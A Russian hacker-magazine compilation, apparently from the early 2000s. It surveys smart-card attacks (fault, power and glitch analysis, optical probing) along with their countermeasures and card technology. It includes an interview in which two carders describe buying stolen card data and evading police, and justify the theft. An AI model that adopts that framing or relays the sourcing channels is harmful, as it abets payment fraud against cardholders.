Для иллюстрации мощи новой атаки была разработана методика, позволяющая с помощью вспышки и микроскопа выставлять в нужное значение (0 или 1) любой бит в SRAM-памяти микроконтроллера. Методом "оптического зондирования" (optical probing) можно индуцировать сбои в работе криптографических алгоритмов или протоколов, а также вносить искажения в поток управляющих команд процессора. Понятно, что перечисленные возможности существенно расширяют уже известные "сбойные" методы вскрытия криптосхем и извлечения секретной информации из смарт-карт.
Индустрия, как обычно, пытается всячески принизить значимость нового метода вскрытия, поскольку он относится к классу разрушающих атак, сопровождающихся повреждением защитного слоя в чипе смарт-карты. Однако, по свидетельству Андерсона, злоумышленники могут обойтись и минимальным физическим вмешательством: кремний прозрачен в инфракрасном диапазоне, поэтому атаку можно проводить прямо через кремниевую подложку с задней стороны чипа, сняв лишь пластик. Используя же рентгеновское излучение, карту и вовсе можно оставить нетронутой.
Меры противодействия
Арсенал средств защиты смарт-карт на сегодняшний день весьма разнообразен. Разрушающим методам вскрытия могут противостоять емкостные датчики или оптические сенсоры под светонепроницаемой оболочкой (что крякеры давно научились обходить). Либо "специальный клей" - покрытие для чипов, которое не только непрозрачно и обладает проводимостью, но также надежно противостоит попыткам уничтожить его, обычно разрушая кремниевый слой, находящийся под ним. Такие покрытия относятся к федеральному стандарту США FIPS 140-1 и широко используются в американской военной промышленности, но повсеместно распространенными в быту их назвать нельзя.
Ряд недорогих и эффективных методов противодействия "дифференциальному анализу питания (ДАП)" и "дифференциальному анализу искажений (ДАИ)" известен по разработкам Cryptography Research. В частности, созданы особые аппаратные и программные методы, обеспечивающие значительно меньший уровень утечек компрометирующей информации, внесение шума в измерения, декоррелирование (разделение взаимозависимостей) внутренних переменных и секретных параметров, а также декоррелирование по времени криптографических операций.
Значительный ряд новых методов защиты предложен компьютерными лабораториями Лувена и Кембриджа (www.dice.ucl.ac.be/crypto, www.cl.cam.ac.uk/Research/Security/tamper/). Суть одного из них, например, заключается в замене традиционных электронных схем самосинхронизирующейся "двухрельсовой" (dual-rail) схемой, где логические 1 и 0 не кодируются, как обычно, импульсами высокого (H) и низкого (L) напряжения в единственном проводнике, а представляются парой импульсов (HL или LH) в двух проводниках. В этом случае появление "нештатной" пары импульсов вида (HH) сразу становится сигналом тревоги, приводящим, как правило, к перезагрузке процессора.
Одно дело читать обо всех этих методах на бумаге и совсем другое - увидеть, как это работает реально. По свидетельству специалистов, открывающаяся картина действительно впечатляет. И стимулирует, конечно же, на поиск новых мер противодействия с еще большим рвением.
Устройство смарт-карты
Типичная смарт-карта - это 8-битный микропроцессор, постоянное запоминающее устройство (ROM), оперативная память (RAM), электрически перепрограммируемая память (EEPROM или FLASH, где, в частности, хранится криптографический ключевой материал), последовательные вход и выход. Все это хозяйство размещается в одном чипе, заключенном в корпус - обычно пластиковую карту размером с кредитку.
Смарт-карты по своим потенциальным возможностям имеют целый ряд важных преимуществ по сравнению с другими технологиями. Обладая собственным процессором и памятью, они могут участвовать в криптографических протоколах обмена информацией, и, в отличие от карточек с магнитной полоской, здесь хранимые данные можно защищать от неавторизованного доступа. Беда лишь в том, что реальная стойкость этой защиты зачастую переоценивается.
Далее будет представлен краткий обзор наиболее важных технологий, используемых при вскрытии смарт-карт. Эта информация важна для любого человека, желающего получить реальное представление о том, как происходит вскрытие защищенных устройств, и каких затрат это стоит. Естественно, тщательное изучение применяемых методов вскрытия позволяет вырабатывать адекватные контрмеры и создавать намного более эффективную защиту смарт-карт.
Все технологии микрозондирования по сути своей являются разрушающими атаками. Это значит, что для их реализации требуются многие часы, иногда недели работы в условиях специализированной лаборатории, а сам исследуемый чип при этом разрушается. Остальные три категории относятся к неразрушающим атакам. Иначе говоря, после того, как злоумышленник подготовил такую атаку в отношении конкретного типа процессора и уже известной версии программного обеспечения, он может с легкостью воспроизвести ее в отношении любой другой карты того же типа. При этом атакуемая карта физически не повреждается, а оборудование, использованное для атаки, обычно можно замаскировать под обычный ридер (считыватель смарт-карт).
Очевидно, что неразрушающие атаки особо опасны, поскольку не оставляют за собой следов. Но понятно и то, что сама природа атак такого рода подразумевает детальное знание процессора и программного обеспечения конкретной карты. С другой стороны, для разрушающих атак микрозондированием требуется очень мало исходных знаний о конкретной конструкции.
Таким образом, атака на новую смарт-карту обычно начинается с разрушающей обратной инженерной разработки, результаты которой помогают создать более дешевые и быстрые неразрушающие атаки. В частности, именно такая последовательность событий многократно отмечена при вскрытии карт условного доступа в системах платного телевидения.
К этому типу атак относят те, которые сопровождаются вскрытием корпуса устройства. Публичное представление таких методов, применяемых в крякерском подполье, впервые было сделано в 1996 году исследователями из Кембриджского университета Россом Андерсоном и Маркусом Куном в ходе второго семинара USENIX по электронной коммерции (Росс Андерсон, Маркус Кун "Стойкость к вскрытию. Предупреждение", www.cl.cam.ac.uk/~mgk25/tamper.html). Более подробно эти технологии описаны в совместной статье Куна и Оливера Кеммерлинга 1999 года "Принципы конструирования защищенных процессоров смарт-карт" (www.cl.cam.ac.uk/~mgk25/sc99-tamper.pdf), а также в последующей докторской диссертации Куна, которая, правда, в интернете не опубликована.
В начале 1990-х годов в Кавендишской лаборатории Кембриджа была создана технология обратного восстановления схемы сложных кремниевых чипов, позволяющая аккуратно снимать слои микросхемы один за другим. Одно из примененных здесь новшеств - техника показа примесных N и Р слоев на основе эффекта Шоттки: тонкая пленка из золота или палладия накладывается на чип, образуя диод, который может быть виден в электронном луче. Изображения последовательных слоев чипа вводятся в компьютер, специальное программное обеспечение очищает первоначально нечеткие образы, выдает их ясное представление и распознает стандартные элементы чипа. Эта система была протестирована на процессоре Intel 80386 и ряде других устройств. Работа над восстановлением 80386 заняла две недели, причем для правильной реконструкции обычно требуется около шести образцов чипа. Результатом работ могут быть диаграммы масок и схем или даже список библиотечных ячеек, из которых чип был сконструирован.
В условиях, когда конструкция и принципы функционирования чипа уже известны, существует очень мощная технология, разработанная в IВМ для исследования чипа в работе даже без удаления защитного слоя. Для измерения рабочих характеристик устройства над ним помещают кристалл ниобата лития. Показатель преломления этой субстанции изменяется при изменении электрического поля, и потенциал находящегося под ней кремния может считываться с помощью ультрафиолетового лазерного луча, проходящего через кристалл под скользящим углом наклона. Возможности этой технологии таковы, что можно считывать сигнал в 5 В с частотой до 25 МГц. По сути, это стандартный путь для хорошо оснащенных лабораторий при восстановлении криптоключей в чипах, конструкция которых известна.
Чаще всего критика в адрес дифференциального анализа искажений (особенно со стороны выпускающих смарт-карты фирм) сводилась к тому, что вся эта методика носит сугубо теоретический характер. Ведь никто не продемонстрировал на практике, что сбойные ошибки можно вызывать именно в криптосхеме, причем конкретно в алгоритме разворачивания ключа.
Но уже весной 1997 года появилось описание не теоретической, а весьма практичной атаки, получившей название "усовершенствованный метод ДАИ". Авторы атаки (кембриджский профессор Росс Андерсон и его аспирант из Германии Маркус Кун) продемонстрировали, что могут извлекать ключ из смарт-карты менее чем по 10 блокам шифртекста. В основу нового метода была положена модель принудительных искажений или "глич-атак" (от английского glitch - всплеск, выброс), реально практикуемых крякерами при вскрытии смарт-карт платного телевидения.
Под глич-атаками понимаются манипуляции с тактовой частотой или напряжением питания смарт-карт, что позволяет выдавать дампы с ключевым материалом на порт выхода устройства. Эффективность глич-атак продемонстрирована кембриджскими авторами как на симметричных криптосхемах, так и на вскрытии алгоритмов с открытым ключом. Ссылки на соответствующие статьи дыбай на сайте Росса Андерсона - www.cl.cam.ac.uk/users/rja14/#Reliability.
В традиционном анализе криптоустройств и защищенных протоколов принято предполагать, что входное и выходное сообщения доступны злоумышленнику, а какая-либо информация о ключах ему неизвестна. Однако любое электронное устройство состоит из конкретных элементов, выдающих в окружающую среду информацию о своей работе. А значит, на самом деле, атакующей стороне может быть доступна и всевозможная побочная информация, выдаваемая криптоустройством: электромагнитное излучение, сигналы об ошибках или об интервалах времени между выполняемыми инструкциями, колебания в потреблении электропитания и другие данные. Вообще, все это очень хорошо известно военным и спецслужбам, где разработаны специальные методы работы с побочными каналами утечки информации, но тема эта (под кодовым наименованием Tempest) строго засекречена и открытых публикаций о ней очень мало.
Этими же специалистами из Кембриджа совместно с учеными компьютерной лаборатории Лувенского университета (Бельгия) недавно разработаны еще несколько новых методов считывания информации из защищенных чипов смарт-карт (David Samyde, Sergei Skorobogatov, Ross Anderson, Jean-Jacques Quisquater: On a New Way to Read Data from Memory - www.ftp.cl.cam.ac.uk/ftp/users/rja14/SISW02.pdf). Общим для данных методов является то, что они индуцируют поддающиеся замерам изменения в аналоговых характеристиках ячеек памяти.
Например, сканируя ячейки сфокусированным лазером или наводя в них вихревые токи с помощью индуктивной спирали на игле микропробника, можно повысить электромагнитные утечки, выдающие записанное там значение бита, но при этом само это значение сохраняется в ячейке ненарушенным. Сильным охлаждением чипа в нужный момент времени можно "заморозить" содержимое интересующего регистра и считать из него (ключевую) информацию, обычно хранящуюся или передаваемую в зашифрованном виде. Эта технология применима к самым разным типам памяти от RAM до FLASH и реально продемонстрирована считыванием ключей DES из ячеек RAM без какого-либо физического контакта с чипом.
Эта работа проведена учеными по заказу проекта Евросоюза G3Card и ставит перед собой цель создания смарт-карт следующего поколения, способных максимально противостоять современным атакам, вплоть до "полуразрушающих". Создание абсолютной защиты, естественно, не является реалистичным для устройств, применяемых в действительности, одно из главных достоинств которых - дешевизна.
Разработкой мер защиты смарт-карт от вскрытия, конечно же, занимаются не только в университетах или маленьких фирмах, вроде Cryptography Research Пола Кочера или Advanced Digital Security Research Оливера Кеммерлинга. Большая работа ведется и непосредственно в смарт-карточной индустрии, где, правда, предпочитают в подробностях не распространяться на эту тему. Но иногда кое-какая информация все же просачивается.
Так, в прошлом году на криптографической выставке-конференции RSA-2002 интереснейшая экспозиция была устроена компанией Datacard Group (www.datacard.com), специализирующейся на разработке смарт-карт. На своем выставочном стенде сотрудники фирмы развернули некий "полевой вариант" небольшой электронной лаборатории. Буквально на глазах изумленной публики демонстрировалось вскрытие смарт-карт с помощью описанных выше методов ДАП и ДАИ. Оборудования для этих работ требовалось совсем немного - осциллограф, компьютер да несколько "специальных коробочек".
Для зрителей процесс вскрытия смарт-карты выглядел примерно так: "Сейчас вы видите на экране осциллографа последовательность вертикальных всплесков. Это циклы DES-алгоритма, шифрующего информацию в чипе карты. Давайте увеличим разрешение картинки. Внутри цикла вы видите пики характерной формы - это S-боксы, преобразующие нужный нам ключ. Давайте запустим программу вскрытия, которая по особенностям этих сигналов отыскивает биты секретной информации, и вот через минуту или две мы получаем ключ на выходе программы".
Тройной DES вскрывался аналогично, но примерно раза в 3 раза дольше. Те же самые несколько минут уходили у аналитиков Datacard на отыскание пары больших простых чисел, образующих ключ в алгоритме RSA. Для этого не использовались, ясное дело, ужасно трудоемкие методы факторизации, а "просто" внимательно анализировались реакции чипа смарт-карты на небольшие варьирования в напряжении и частоте при подаче питания...
Практически все типы смарт-карточных чипов в европейских, а затем в американских и азиатских системах платного телевидения были успешно вскрыты крякерами при помощи методов обратной инженерной разработки.
Общение с кардером
Блуждая как-то ночью по просторам Сети, я случайно наткнулся на сайт, целиком посвященный кардингу - www.cardingworld.com. Набравшись смелости, я завязал беседу с владельцами ресурса. Знакомьтесь - David и Graf.
Бытует мнение, что все кардеры - замкнутые звероподобные и скрытные существа, которых не то что разговорить, трудно просто отловить живьем. На самом деле они - самые обычные люди, а быть скрытными их вынуждает хобби, которое подпадает под определенные статьи УК. Но не все занимаются кардингом на практике (знают только в теории), либо переросли свое увлечение и давно отошли от дел. Кто-то вспоминает с ностальгией, кто-то создает свои ресурсы, а кто-то на этих ресурсах еще и зарабатывает, основав для собратьев плацдарм, помогающий оперативно обмениваться нужной информацией.
XS: Для начала расскажите немного о себе. Имя, возраст, где обитаете?
David: Зовут меня Серега, 19 лет от роду, живу в Минске.
Graf: А меня величают Костя, 21 год уже пошел, живу в далекой Кемеровской области, что в славном государстве Россия.
XS: Как прошло ваше детство? С кровати не падали?
David: Детство прошло отлично, хотя с компьютерами оно связано не было.
Graf: Да нормально, не жалуюсь, всякое в жизни бывает - и плохое, и хорошее.
XS: В каком году появился первый комп? Чем увлекались?
David: Первый компьютер под странным названием "ВЕКТОР" появился приблизительно в 1990 году. Первое время, как и большинство пользователей ПК, играл в разные игрушки. Позже стал интересоваться всем остальным.
XS: А как обстоят дела с образованием? Где в данный момент грызете гранит?
David: В данный момент заканчиваю учиться в негосударственном техникуме. Специальность в чем-то связана с кардингом, хотя на момент поступления я еще не увлекался этим направлением.
Graf: Я окончил школу и колледж, сейчас учусь в университете, на полпути к диплому.
XS: Что такое кардинг? Ваше мнение?
Graf: Кардинг - это способ завладеть чужими деньгами или приобретение какого-либо товара с помощью ворованных кредитных карточек.
XS: Когда и почему стали увлекаться кардингом?
David: Стал увлекаться кардингом чуть больше года назад. Ну, в принципе, занятие кардингом меня сильно затянуло, да и неплохой денежный доход приносит.
Graf: Занимаюсь кардингом уже 2 года, так как вижу в этом реальный способ заработать хорошие деньги, плюс огромный интерес.
XS: Сколько времени вам понадобилось, чтобы, встав однажды утром, гордо сказать: "Я - кардер"?
David: Чтобы понять, что я действительно кардер, мне понадобилось около года усиленной работы в этом направлении.
Graf: Полгодика
.XS: Как продвигались? Что читали по ночам?
David: Все началось со сбора полезной инфы из Сети и чтения подобных статей, что и помогло мне в этом разобраться.
Graf: Со мной произошла отдельная история. Я спокойно шел по улице и вдруг заметил кредитную карту с чипом. Я очень заинтересовался, есть ли там деньги, а также как их можно снять. Недолго думая, я обратился за помощью к интернету. Сначала я искал, как взломать чип, потом постепенно узнал, что такое креды. Ну, а там, естественно, как их можно обналичить. И пошло-поехало.
XS: Что сейчас происходит на сцене? Кого считаете своими кумирами в мире кардинга?
Graf: Сцена живет, кардеры - это как чума, от которой еще не придумана вакцина. Мы были, есть и будем до тех пор, пока существует Сеть. Каждый кардер по-своему уникален, так что называть отдельно никого не буду.
David: Есть для меня несколько авторитетов в мире кардинга, но я бы не хотел говорить о них "в прямом эфире".
XS: Как возникла идея создать сайт?
David: Идея создать сайт пришла Graf’у, а я взял на себя ответственность за его разработку.
Graf: Я познакомился с David'ом, мы нашли общий язык, стали часто общаться, потом у меня появилась идея создать свой проект, он поддержал меня в этом начинании, после чего и появился сам сайт. Все просто, как сама жизнь
.XS: Какую функцию выполняет форум на сайте?
Graf: Помогает нашим мемберам в той или иной сфере кардинга, на нашем форуме всегда можно дать объявление, найти что-либо необходимое для себя, проконсультироваться и почерпнуть кучу полезной информации.
David: От себя хочу также добавить, что форум помогает общаться новичкам и продвинутым кардерам, обмениваться опытом, получать ответы на различные вопросы и т.п.
XS: Какими способами лично вы достаете креды? Какой из способов считаете самым оптимальным и безопасным?
David: Как? Я лично не хакер, чтобы ломать направо и налево интернет-магазины, поэтому покупаю картон у знакомых.
Graf: Я беру кредитки у друзей. Считаю это самым безопасным способом, а так креды добываются в основном взломом различных порносайтов, онлайн-шопов и прочих организаций, принимающих к оплате кредитные карты.
XS: Как происходит торговля кредитными карточками?
David: Креды (картон) можно купить у известных людей оптом, что будет намного дешевле, чем в розницу. Картон продают в основном за WebMoney или за E-Gold. Схема такова: ты отправляешь определенную сумму на кошелек продавцу, а тебе взамен присылают по аське или по e-mail'у картон. IMHO, нет ничего проще!
XS: Какие методы используют онлайн-шопы для борьбы с "ужасными" кардерами?
Graf: Методов борьбы очень много, но нам они уже давно известны и хорошо проработаны. Сначала были простые кредитки, сейчас ввели защитный код cvv2 и cvc. Хотя найти сайты с использованием простых кред тоже еще реально. Есть случаи, когда требуется голосовое подтверждение. Часто требуется выслать сканы паспорта, прав или кредитной карты. Но мы не спим и постоянно придумываем методы противодействия различным защитам.
XS: Совесть не мучает?
David: А почему меня совесть должна мучить? Я же не своих граблю, а в основном жадных буржуев или богатых магнатов. Я же не забираю последние деньги у нищего.
Graf: Нет, не мучает. А за что? За то, что я беру немного денег у зажравшейся нации, таких, как Амеры? Страна, где 60% населения страдают ожирением, которые вечно лезут, куда их не просят, что-то диктуют, указывают, в каждой жопе затычка? Один старый кардер сказал умную фразу: "Мы сделаем Штаты немного беднее, а Россию и СНГ немного богаче".
XS: Ваша позиция ясна. А знаете такой отдел "К"?
David: Конечно. Знаем и про отдел "Р", и про отдел "К". Вот и используем любые средства, чтобы обезопасить себя от них. Практически все кардеры используют анонимные прокси, VPN и прочие фишки.
Graf: Знаю. Попасть к ним в лапы, конечно, не хотелось бы, но, как говорится, волков бояться - в лес не ходить.
XS: Какая ось установлена у вас на ПК, какую считаете самой безопасной?
David: В данный момент установлен Windows 2000 Pro. Не использую Linux, так как привык к окошкам.
Graf: До появления XP использовал 98, а теперь всерьез подсел на XP. А безопасность в микрософте - понятие относительное
.XS: У кардера какой-то особый софт на тачке или как у всех?
David: На моем писюке прижились Miranda, WinRar, FlashGet, RusmIRC, SocksCap, CuteFTP Pro, Internet Explorer, Webmoney, WinAmp и прочие софтинки. А помимо этого использую множество самописного софта, перечислять нет смысла - все noname
.Graf: Не буду оригинален: IE, OutLook, ICQ, WinAmp, OutPost...
XS: На чем программируете?
David: PHP, ASP и C++.
XS: А чем занимаетесь в свободное от кардинга время?
David: В свободное время пытаюсь находиться на расстоянии от компьютера
. Отдыхаю как все обычные люди.Graf: Учусь, тусуюсь в клубах, отдыхаю всячески и по-разному.
XS: Что кардеры слушают?
David: В основном Круг. Обожаю русский шансон, но могу на время запасть и на классные диджейские миксы.
Graf: Особых кумиров у меня нет, но люблю послушать Linda, Enigma, Prodigy, In-Grid, Глюкоза и ВИАГРА.
XS: Что читают? Любимый автор?
David: Пока не хватает времени на книги, учусь усиленно
.Graf: Сейчас ничего не читаю, только прессу. Любимый автор - Достоевский.
XS: Смотрите ТВ?
David: Естественно смотрю, в основном спорт. Иногда новости.
Graf: Конечно. Люблю хорошие фильмы и свежие новости.
XS: И напоследок пару слов нашим читателям, желающим встать на путь кардинга.
David: Прежде чем примешь решение выйти на "большую дорогу", подумай над этим 101 раз.
Пластиковые карты на все случаи жизни
Вот уже несколько десятилетий пластиковые карты широко используются в повседневной жизни. Появившись задолго до распространения персональных компьютеров и сотовых телефонов, они заменяют бумажные купюры, пропуска и удостоверения.
Но очевидные преимущества скрывают за собой менее очевидные недостатки. Если для того, чтобы лишить тебя наличности, мошеннику необходимо вытащить кошелек у тебя из сумки или кармана, то для воровства с помощью пластиковых карт он может находиться в соседней комнате, а может и на другом континенте.
Проблема identity theft (дословно - воровство идентификационных данных) стала в последнее время одной из самых обсуждаемых тем. Хотя под этим термином понимают и подделку чеков, и кражу паролей, а по мере распространения альтернативных механизмов аутентификации (в частности, биометрия) приходится учитывать все новые и новые возможности для злоупотреблений личной информацией, в центре внимания находятся именно пластиковые карты.
Они есть и у студентов, и у бизнесменов, и у домохозяек - дебетные и кредитные, для проезда на общественном транспорте, оплаты телефонных переговоров, доступа в интернет и т.п. Дошло до того, что пластиковые телефонные карты стали объектом коллекционирования - на любом онлайн-аукционе можно найти раздел, посвященный этой "филателии XXI века". Даже в поликлиниках вместо бумажного страхового полиса теперь выдают пластиковые карты!
По методу хранения информации весь этот "пластик" можно разделить на три основных категории: карты с магнитной полосой, скретч-карты и смарт-карты. В отдельную группу выделяют пластиковые визитные карточки и прочую сувенирную продукцию, виды правонарушений с их использованием якобы неизвестны. Хотя в метро я несколько раз проходил мимо свирепых старушек, показывая им пластиковый календарик, причем прошлогодний
.Карты с магнитной полосой
Первое, что приходит в голову, когда слышишь термин "пластиковая карта" - это классические карты с магнитной полосой. Появились они еще в 50-х годах прошлого века. Пионером в использовании новой технологии стала компания Diners Club, а затем к ней присоединилась и American Express. За это время карты распространились по всему миру, на них же и приходится самый большой процент противоправных действий или, попросту говоря, случаев мошенничества и воровства.
Согласно стандарту ISO-7810, пластиковая карта представляет собой прямоугольную пластину размером 85,6х54 мм и толщиной 0,76 мм. Для защиты этого миниатюрного кусочка пластмассы используются последние технологии в самых разных областях: полиграфии, химической промышленности, разработке программного обеспечения и т.п.
Обычно карта несет на себе следующую информацию:
На лицевой стороне:
уникальный 16-значный номер;
срок действия (от и до);
имя владельца.
На тыльной стороне:
магнитная полоса;
подпись владельца.
Кроме того, полиграфическим способом на карту может наноситься множество изображений: фотография владельца, справочная информация для клиентов банка и т.п.
Буквы и цифры на лицевой стороне могут быть выбиты специальным эмбоссером, а могут быть и просто напечатаны, к примеру, как на картах Visa Electron.
Основным хранилищем данных на карте является магнитная полоса. По своим свойствам она похожа на пленку, которая используется в аудиокассетах. Информация может записываться на три дорожки, отличающиеся форматом:
первая имеет плотность записи 210 бит на дюйм (BPI) и может содержать 79 7-битных (6 бит + четность) алфавитно-цифровых символов (доступны только для чтения);
вторая - 75 BPI, содержит 40 5-битных (4 бита + четность) цифр;
третья - 210 BPI, содержит 107 5-битных (4 бита + четность) цифр.
На банковских картах на дорожки записываются: номер счета, код валюты, код страны выдачи, имя владельца, срок действия (в принципе, та же информация, что напечатана на самой карте, но в цифровом виде). Кроме того, любая компания может использовать собственный формат данных. Например, для использования в качестве внутреннего пропуска там вместо номера счета может быть указан уровень полномочий владельца и т.п.
Каждый раз для проведения денежных транзакций с помощью банковских карт системой инициируется процесс аутентификации - проверяется правильность записанной на карте информации. Аутентификация бывает следующих видов:
- голосовая авторизация - простейший случай, проводится с помощью телефона с тоновым набором;
- электронный терминал - считывание информации с магнитной полосы, например, в банкоматах или POS-терминалах;
- виртуальный терминал - проверка данных при оплате через интернет.
В любом случае, на одной стороне находится владелец карты, а на другой - специализированная организация (aquirer), которая устанавливает связь с банком, выдавшим карту, для проверки данных:
- номер карты;
- лимит (для кредитной карты);
- срок действия карты;
- наличие денег на счете.
Если все необходимые условия выполнены, а запрошенная сумма не превышает остаток на счете, эта же организация обеспечивает гарантии перевода денег другому участнику транзакции.
Передача данных между терминалом и проверяющей организацией происходит по телефонным сетям или по интернет-каналам. Для защиты передаваемых данных используется шифрование. К примеру, банкомат шифрует введенный PIN-код и отправляет его для сверки с тем, что хранится в базе данных банка, выдавшего карту. Для шифрования используется криптографический метод односторонних функций. Их значение легко вычислить в одном направлении с использованием банковского ключа и набранного PIN-кода, а проведение обратного преобразования (инвертирования) на практике очень неэффективно, даже если банковский ключ стал известен. Эта защита была введена, чтобы защитить держателя карты от действий нехорошего дяди, получившего доступ к банковским базам.
Кроме технических средств, большое значение имеют организационные и административные методы защиты. Они включают в себя целый комплекс мер на самых разных уровнях: от специальных замков на кабинах банкоматов и call-центров экстренной помощи, куда следует обращаться в случае утери или кражи карточки, до правительственного контроля над продажей оборудования для производства самих карт.
Казалось бы, в процессе оплаты по пластиковой карте все настолько предусмотрено, а каждая операция проходит столько различных проверок, что проще, наверное, было бы внедриться в зарубежную разведку, чем украсть деньги со счета. И хотя статистику выявления шпионов от нас скрывают, судя по доступной информации о случаях мошенничества, все оказывается далеко не так радужно, как хотелось бы. При удачных атаках добычей хакеров становится информация о миллионах банковских карт. И такие случаи происходят достаточно часто, чтобы заставить беспокоиться каждого, кто хранит свои деньги "на карточке".
Но проблемы, с которыми сталкиваются люди при использовании пластиковых карт с магнитной лентой, не ограничиваются лишь противоправными действиями. Как и любая другая технология полувековой давности, они имеют ряд редостатков. К примеру, массу неудобств приносит тот факт, что любой магнит может элементарно стереть всю хранящуюся информацию, и даже простые царапины могут повлиять на ее целостность. И это еще не самое страшное, по сравнению с другими "родовыми травмами".
Смарт-карты
Технология смарт-карт, призванная исправить эти недостатки, существует довольно давно. Впервые ими начали пользоваться французы в 1984 году. Но до сих пор они не получили повсеместного распространения. Хотя и были планы, согласно которым к 2004 году все платежные системы собирались перейти на использование смарт-карт, банки все продолжают выпускать старый добрый "пластик".
Снаружи карты обоих типов (магнитные и смарт-карты) выглядят почти одинаково, но зато внутри... Начну с того, что у обычных карт никакого "внутри" вообще нет, а у смарт-карт там под позолоченными контактами спрятан микрочип. Он может содержать до килобайта RAM, 24 Кб ROM и 16 Кб перепрограммируемого ROM. В нем есть еще и 8-битный микропроцессор, работающий на частоте около 5 МГц. И все это в упаковке тоньше миллиметра! Понятное дело, что с таким богатством магнитная полоса отпадает за ненадобностью.
Вычислительные возможности процессора позволяют перейти от обычной аутентификации к полноценному применению криптографии. И хотя для пользователя, снимающего деньги, процедура выглядит привычно (ввел PIN-код и готово), внутри системы работает сложный механизм обмена зашифрованными данными.
Для того чтобы обеспечить максимальную защиту этих алгоритмов, на каждом этапе жизненного цикла смарт-карт закладывается свой "секрет". Таким образом, даже если злоумышленники внедрятся непосредственно в технологический процесс, сами карты не будут скомпрометированы.
Процессор внутри каждой карты работает под управлением операционной системы, предоставляющей достаточно удобный интерфейс для разработчика. Именно благодаря этой системе и возможно выполнение программ, запись и чтение файлов, шифрование и проверка криптографических данных. Гибкость ее настолько велика, что корпорация Sun даже разработала платформу Java Card, позволяющую использовать для разработки специализированных приложений свою сверхпопулярную технологию Java.
Существенно увеличенная (по сравнению с магнитной картой) емкость носителя и удобный доступ к хранящимся данным позволяют использовать одну карточку для нескольких типов операций. К примеру, в качестве пропуска, для получения зарплаты и доступа в компьютерную сеть компании. Таким образом ты избавляешься от тугой стопки карт в кошельке, получая вместо них одну универсальную.
Что же мешает внедрению этой замечательной технологии на практике? Как ни банально, все опять упирается в деньги. И дело здесь не только и не столько в разнице стоимости готовых карт. Все дело, прежде всего, в огромной инфраструктуре, обширной сети банкоматов, POS-терминалов и прочей техники, охватившей всю планету. Замена и модификация оборудования, разработка и внедрение программного обеспечения, обучение персонала - трудно даже представить, во сколько все это обойдется.
Из-за этих сложностей смарт-карты пока внедряются на более узких рынках. Например, многие современные компьютеры, особенно предназначенные для корпоративных заказчиков, имеют встроенные устройства для их чтения. Так как большинство операционных систем поддерживают авторизацию пользователей с помощью аппаратных средств, это позволяет существенно повысить безопасность в компьютерной сети компании. Теперь нерадивые пользователи не будут приклеивать бумажку с паролем на монитор или класть ее под клавиатуру
. Будет достаточно вставить свою персональную (без пошлостей) карту в слот и готово.В новостях регулярно появляются сообщения о том, что правительства разных стран планируют использовать возможности смарт-карт для создания паспортов нового поколения, размещая в памяти целую картотеку данных по каждому гражданину: биометрическую информацию, медицинскую и страховую истории, ключи персональной "электронной подписи" и т.п.
Скретч-карты
Мошенничество с предоплаченными, или скретч-картами, наиболее распространено. Действительно, несерьезно было бы тратить время и деньги на разработку каких-то хитрых технологий для считывания информации под защитным слоем. К тому же прибыли здесь несравнимо меньше и ограничены. Гораздо интереснее закупить оборудование и организовать производство большой партии "двойников", максимально похожих на карты популярных платежных систем, телекоммуникационных компаний и т.п.
Из-за специфики скретч-карт, их графическому оформлению уделяется особое внимание. Обычно отличия "двойников" от оригинала проявляются именно в деталях, когда не удается повторить более сложный технологический процесс или миниатюрные элементы рисунка. Так, в известном инциденте с распространением поддельных карт "БИ+" опознать их можно было по более широким линиям штрих-кода и способу его нанесения (не над защитным слоем ламината, а под ним). Еще одним различием (более заметным) был повторяющийся серийный номер.
В простейшем случае номера генерируются случайно. Если же преступникам каким-либо образом удастся заполучить базы данных действительных номеров и PIN-кодов, а потом выбросить на рынок подобные подделки… Примерно такие кошмары снятся руководителям служб безопасности крупных интернет-провайдеров и компаний-операторов сотовой связи
.Именно поэтому многие крупные фирмы предпочитают взять выпуск "пластика" в свои руки. Для этого они закупают оборудование на сотни тысяч долларов, обучают персонал и налаживают собственное производство. Впрочем, зачастую бывает достаточно закупать готовые карты у специализированных компаний, а потом на собственных мощностях наносить на них номера и защитный слой.
Что дальше
Три описанные категории не охватывают все разнообразие карт. Для пропусков и страховых полисов, к примеру, часто используются лишь штрих-коды, а в дисконтных и клубных системах карты могут вообще не нести никакой информации, кроме уникального номера и ФИО. В большинстве случаев повысить относительно невысокий уровень защиты позволяет нанесение фотографии владельца (и на проходной, и в магазине достоверность дополнительно проверяется человеком). А защитить карту от подделки помогает сложная полиграфия, например, нанесение голографического рисунка.
В общем, технологий очень много, а завтра будет еще больше. Хорошо ли это? Да просто замечательно! Но верно сказал классик: воруют...
Номер карты
Номер карты является первичным источником информации о ней: по нему можно узнать тип карты, банк-эмитент, а также номер счета. Структура может различаться (так, существуют карты Visa с 13 и 16-значными номерами), но по первой цифре всегда можно определить, какой системе она принадлежит:
3 – American Express, Diners Club и некоторые другие системы
4 – Visa
5 – MasterCard
6 – DiscoverCard
Жизнь карты
Первый этап: производство компонентов
После сборки в чип закладывается специальный ключ (fabrication key, KF). Он не позволяет внести в него изменения до непосредственного запечатывания в пластик. KF создается с помощью специальных алгоритмов и с использованием мастер-ключа изготовителя, уникален для каждой выпускаемой карты.
Второй этап: перед персонализацей карты
Готовый чип поставляется компании, выпускающей чистые смарт-карты. На месте он устанавливается на пластиковую основу и тестируется. FK заменяется ключом персонализации (personalisation key, KP). Для дополнительной безопасности на KP устанавливается блок Vper (personalisation lock). Физический доступ к памяти полностью закрывается, а для записи и изменения информации используется только программный метод. После этого системные области, на которых содержатся заложенные ключи, недоступны для чтения и записи.
Третий этап: персонализация карты
Этот этап выполняется компанией-эмитентом (например, банком). В память записывается специальное программное обеспечение, формируются файлы данных, содержащие информацию о владельце карты, PIN-коде и т.д. В конце данные закрываются блоком Vutil (utilisation lock). После этого карта может выдаваться ее новому владельцу.
Четвертый этап: использование карты
В процессе использования активируются программы, они обращаются к логической файловой системе, запускают механизмы шифрования и т.п. Доступ к данным определяется заложенной политикой безопасности.
Пятый этап: истечение срока действия
Переход к заключительному этапу может быть инициирован двумя способами. Первый выполняется программой, которая записывает последний блок (invalidation lock) на мастер-файл. После этого любые операции записи становятся недоступны, но операции чтения могут быть проведены, например, для анализа хранящейся информации. Другой способ заключается в установке блока на PIN-код и дополнительный разблокирующий PIN-код. В этом случае становятся невозможны все операции, даже чтение.
Многие из нас могут даже не догадываться, что являются пользователями смарт-карт. К примеру, SIM-карта твоего сотового телефона являются той самой "умной картой", но без "лишнего" пластика.
